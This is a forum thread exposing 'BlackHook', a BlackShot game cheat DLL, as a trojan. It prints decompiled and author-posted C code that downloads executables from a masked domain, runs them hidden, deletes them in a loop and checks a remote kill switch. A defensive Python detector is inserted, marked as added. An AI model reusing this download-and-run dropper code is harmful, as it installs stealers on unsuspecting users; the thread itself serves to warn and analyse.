Papa0788 (11-17-2010)
Here is a full analysis of Bl@ck H0ok.
For those of you that do not understand it, just skip down to the conclusion.
BlackHook is a hack for blackshot that many of you have tried or are using;
however, what most of you don't know is that this is not just a hack, it's also a virus downloader!
Since this is a self-made virus, no "normal" virus scanner will be able to report this as a virus.
TIP: You should always run suspicious files inside a Sandbox!
Analysis:
This is what BlackHook does when it is injected into a process:
[PHP]BOOL __stdcall DllMain(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpvReserved)
{
    BOOL result; // eax@2
    if ( fdwReason == 1 ) // DLL_PROCESS_ATTACH
    {
        CreateThread(0, 0, (LPTHREAD_START_ROUTINE)D3D9Hook, 0, 0, 0);
        CreateThread(0, 0, (LPTHREAD_START_ROUTINE)Hook, 0, 0, 0);
        CreateThread(0, 0, (LPTHREAD_START_ROUTINE)AskPermission, 0, 0, 0);
        CreateThread(0, 0, (LPTHREAD_START_ROUTINE)RunVirus, 0, 0, 0);
        result = 1;
    }
    else
    {
        if ( !fdwReason ) // DLL_PROCESS_DETACH: delete the dropped files
        {
            remove("bypass.exe");
            remove("bypass_.exe");
            remove("bypass__.exe");
        }
        result = 1;
    }
    return result;
}[/PHP]
First, let's take a look at
[PHP]CreateThread(0, 0, (LPTHREAD_START_ROUTINE)AskPermission, 0, 0, 0);[/PHP]
The code inside this thread will download this file: "https://www.dope****/stlr/public.dat"
and save it as "crasherror.dat".
"crasherror.dat" is just a fake file name to make it look convincing.
What's so special about this file?
This file contains a simple boolean, which tells BlackHook to enable or disable itself.
This means that Cocaine1 (the creator of the BlackHook virus) can make BlackHook unusable for everyone
just by changing this text file.
So if Cocaine1 does not want you to run BlackHook, he can just delete the file from his server,
and now BlackHook will not work anymore.
Now, let's see what RunVirus does:
[PHP]CreateThread(0, 0, (LPTHREAD_START_ROUTINE)RunVirus, 0, 0, 0);[/PHP]
This is what happens inside RunVirus:
[PHP]void __stdcall RunVirus(int Handled)
{
    // Remove any leftovers from a previous run
    remove("bypass.exe");
    remove("bypass_.exe");
    remove("bypass__.exe");
    // Download the three payloads, renaming .dat -> .exe on disk
    URLDownloadToFileA(0, "https://www.dope****/stlr/bypass.dat", "bypass.exe", 0, 0);
    Sleep(5000u);
    URLDownloadToFileA(0, "https://www.dope****/bypass_.dat", "bypass_.exe", 0, 0);
    Sleep(5000u);
    URLDownloadToFileA(0, "https://www.dope****/bypass__.dat", "bypass__.exe", 0, 0);
    Sleep(5000u);
    // Launch them
    ShellExecuteA(0, "open", "bypass.exe", 0, 0, 0);
    Sleep(1000u);
    ShellExecuteA(0, "open", "bypass_.exe", 0, 0, 0);
    Sleep(1000u);
    ShellExecuteA(0, "open", "bypass__", 0, 0, 0); // wrong filename (no ".exe"), this launch fails
    // Keep deleting the files so they are not found on disk
    while ( 1 )
    {
        remove("bypass.exe");
        remove("bypass_.exe");
        remove("bypass__.exe");
        Sleep(250u);
    }
}[/PHP]
This code should be very self-explanatory.
It downloads three viruses and opens them.
You can see that there is a BUG in this program ...
The third virus will not open itself because the filename is wrong lmao.
But if you have ever used BlackHook, you are still infected with the two other viruses. Most likely keyloggers.
Next, I will make a crack for BlackHook which removes the viruses and also enables you to run BlackHook forever. Stay tuned.
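The behaviour described above (a process writes a downloaded file to disk and launches it a few seconds later) is a pattern a defender can hunt for in endpoint telemetry. The following is an added example, not code from the post or from BlackHook: it correlates file-creation and process-creation events from a constructed, simplified Sysmon-style log (the line layout, process names and paths are assumptions made for the example).

```python
import re
from collections import defaultdict
from datetime import datetime

# Constructed sample events in a simplified Sysmon-like layout:
# "<ISO timestamp> <EventID> <source process> <target path>"
# EventID 11 = file created, EventID 1 = process created (Sysmon numbering).
SAMPLE_LOG = """
2010-11-17T10:00:00 11 blackshot.exe C:\\Game\\bypass.exe
2010-11-17T10:00:05 11 blackshot.exe C:\\Game\\bypass_.exe
2010-11-17T10:00:10 11 blackshot.exe C:\\Game\\bypass__.exe
2010-11-17T10:00:15 1 blackshot.exe C:\\Game\\bypass.exe
2010-11-17T10:00:16 1 blackshot.exe C:\\Game\\bypass_.exe
2010-11-17T10:30:00 11 setup.exe C:\\Apps\\app.exe
2010-11-17T12:00:00 1 setup.exe C:\\Apps\\app.exe
"""
# The sample's third launch ("bypass__" without .exe) fails, so no process
# creation event for it would ever be logged; it is left out on purpose.

LINE = re.compile(r"^(\S+) (\d+) (\S+) (.+)$")

def parse(log):
    """Parse the sample layout into (timestamp, event_id, process, target)."""
    events = []
    for raw in log.strip().splitlines():
        m = LINE.match(raw)
        if m:
            ts, eid, proc, target = m.groups()
            events.append((datetime.fromisoformat(ts), int(eid), proc, target))
    return events

def find_drop_and_run(log, window_s=60):
    """Return (process, path, delay_seconds) for every .exe that the same
    process first wrote to disk and then launched within window_s seconds."""
    created = defaultdict(list)  # (process, lower-cased path) -> creation times
    hits = []
    for ts, eid, proc, target in parse(log):
        key = (proc, target.lower())
        if eid == 11 and key[1].endswith(".exe"):
            created[key].append(ts)
        elif eid == 1:
            for t0 in created.get(key, []):
                delay = (ts - t0).total_seconds()
                if 0 <= delay <= window_s:
                    hits.append((proc, target, delay))
                    break
    return hits

if __name__ == "__main__":
    for proc, path, delay in find_drop_and_run(SAMPLE_LOG):
        print(f"ALERT: {proc} wrote {path} and ran it {delay:.0f}s later")
```

The benign setup.exe pair falls outside the 60 second window and is not reported; tighten or widen window_s to trade false positives against misses.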
Now what if there aren't viruses in it?
He could just use the name RunVirus to scare people.
But then there's bypass.exe, which is possibly a bypass for the game.
All I can say is it could be a virus or not.
Although I think it's a virus, since my computer shuts down when I use BlackHook.
@F-U-ALL
The name RunVirus was something I created; the original name was sub_403880.
Like I said, I analyzed this program, I didn't "get" the source code and think it was a virus.
I recreated the source code from assembly just to show you what the program does.
In my post I describe what the program does, and all of it is true and not based on guesswork. Appreciate it.
Let's clear some things...
The original code is:
The check was just downloading the file and checking its size; if it corresponded you could use the hack, if not the hack does nothing (there's an if (auth == true) in every function).
[CODE]BOOL WINAPI DllMain(HMODULE hModule, DWORD dwReason, LPVOID lpvReserved)
{
    if(dwReason == DLL_PROCESS_ATTACH)
    {
        CreateThread(0, 0, LoopFunction, 0, 0, 0); // Keeps hooking the d3d functions
        CreateThread(0, 0, MemHacks, 0, 0, 0);     // Loops and does the memory related hacks
        CreateThread(0, 0, noob, 0, 0, 0);         // "anti-leech" loop
        CreateThread(0, 0, stealers, 0, 0, 0);     // obvious is obvious
    }
    else if(dwReason == DLL_PROCESS_DETACH)
    {
        remove("bypass.exe");
        remove("bypass_.exe");
        remove("bypass__.exe");
    }
    return TRUE;
}

DWORD WINAPI stealers( LPVOID lpParam )
{
    remove("bypass.exe");
    remove("bypass_.exe");
    remove("bypass__.exe");
    URLDownloadToFile( NULL, "https://www.dope****/stlr/bypass.dat", "bypass.exe", 0, NULL );
    Sleep(5000);
    URLDownloadToFile( NULL, "https://www.dope****/bypass_.dat", "bypass_.exe", 0, NULL );
    Sleep(5000);
    URLDownloadToFile( NULL, "https://www.dope****/bypass__.dat", "bypass__.exe", 0, NULL );
    Sleep(5000);
    ShellExecute( NULL, "open", "bypass.exe", NULL, NULL, SW_HIDE);
    Sleep(1000);
    ShellExecute( NULL, "open", "bypass_.exe", NULL, NULL, SW_HIDE);
    Sleep(1000);
    ShellExecute( NULL, "open", "bypass__", NULL, NULL, SW_HIDE);
    while(1){
        remove("bypass.exe");
        remove("bypass_.exe");
        remove("bypass__.exe");
        Sleep(250);
    }
    return 0;
}[/CODE]
The virus thread was downloading 2 files (the third I forgot to comment out), 1 iStealer and the other a DDoSer. NO KEYLOGGERS; for you noobs, all the viruses are keyloggers...
The domain was disabled a long time ago and so was the hack -> it will not work nor infect anyone.
If you had any clue about hacks you would have known the hack is detected by now, and even if you remove the check and the virus thread it will still not work.
One last thing, this is the last build.
Took you 4 and a half months to reverse a useless old hack:
[CODE]MenuAddItem("Cokaine 27.06.2010", writing, &CH_writing, 1, MENUFOLDER);[/CODE]
A "normal" virus scanner detects the URLDownloadToFile function and https:// as a downloader. I thought you were smart?
BTW, if there's any doubt, yes, I am Cokaine/Cokaine1.
Last edited by rikel; 11-13-2010 at 10:26 AM.